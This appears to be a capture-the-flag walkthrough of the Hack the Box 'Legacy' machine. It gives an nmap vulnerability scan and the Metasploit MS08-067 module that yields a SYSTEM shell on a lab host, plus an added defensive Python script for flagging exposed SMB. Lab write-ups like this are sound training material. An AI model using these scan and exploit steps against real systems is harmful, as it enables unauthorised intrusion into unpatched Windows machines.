Hack the Box – Legacy Walkthrough

Today we’re going to solve another CTF machine, “Legacy”. It is now a retired box and is accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: netbios-ssn, microsoft-ds, ms-wbt-server
  • IP Address: 10.10.10.4
  • Difficulty: Easy

Weakness

  • 445: MS08-067

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port  proto  name           state   info
----        ----  -----  ----           -----   ----
10.10.10.4  139   tcp    netbios-ssn    open    Microsoft Windows netbios-ssn
10.10.10.4  445   tcp    microsoft-ds   open    Windows XP microsoft-ds
10.10.10.4  3389  tcp    ms-wbt-server  closed

In many organizations, the port series from 135 to 139 is blocked on the network for security reasons, so port 445 is used for sharing data on the network. Now identify whether the host is vulnerable to MS08-067 using nmap with the following command.

nmap --script vuln -p445 10.10.10.4 -Pn

We found that our host is vulnerable to MS08-067, and we can easily exploit the target.
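For defenders triaging the same kind of scan output, the following added example (not part of the original walkthrough) parses a services table in the layout shown above and flags open NetBIOS/SMB ports, calling out banners that indicate an end-of-life Windows release. The second host in the sample, the EOL_MARKERS list and the function names are assumptions made for illustration.

```python
import re

# Constructed sample in the same column layout as the services table above;
# the 10.10.10.9 row is invented for contrast.
SAMPLE = """\
host        port  proto  name           state   info
----        ----  -----  ----           -----   ----
10.10.10.4  139   tcp    netbios-ssn    open    Microsoft Windows netbios-ssn
10.10.10.4  445   tcp    microsoft-ds   open    Windows XP microsoft-ds
10.10.10.4  3389  tcp    ms-wbt-server  closed
10.10.10.9  445   tcp    microsoft-ds   open    Windows Server 2019 microsoft-ds
"""

SMB_PORTS = {139, 445}
# Assumption: banner substrings treated as end-of-life Windows releases.
EOL_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")


def parse_services(text):
    """Parse the fixed-width table, taking column offsets from the dashed ruler."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header, ruler, rows = lines[0], lines[1], lines[2:]
    starts = [m.start() for m in re.finditer(r"-+", ruler)]
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [header[a:b].strip() for a, b in bounds]
    parsed = []
    for row in rows:
        rec = {n: row[a:b].strip() for n, (a, b) in zip(names, bounds)}
        rec["port"] = int(rec["port"])
        parsed.append(rec)
    return parsed


def triage(services):
    """Return (host, port, reason) for each open NetBIOS/SMB service."""
    findings = []
    for s in services:
        if s["state"] != "open" or s["port"] not in SMB_PORTS:
            continue  # closed ports and non-SMB services are out of scope here
        eol = next((m for m in EOL_MARKERS if m in s["info"]), None)
        reason = f"SMB on end-of-life OS ({eol})" if eol else "SMB exposed"
        findings.append((s["host"], s["port"], reason))
    return findings


if __name__ == "__main__":
    for host, port, reason in triage(parse_services(SAMPLE)):
        print(f"{host}:{port}  {reason}")
```
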

Exploitation

So we’re gonna use a Metasploit module to exploit this vulnerability.

Module: exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

And we got our shell, and we’re already NT Authority.

User: C:\Documents and Settings\john\Desktop\user.txt

Root: C:\Documents and Settings\Administrator\Desktop\root.txt
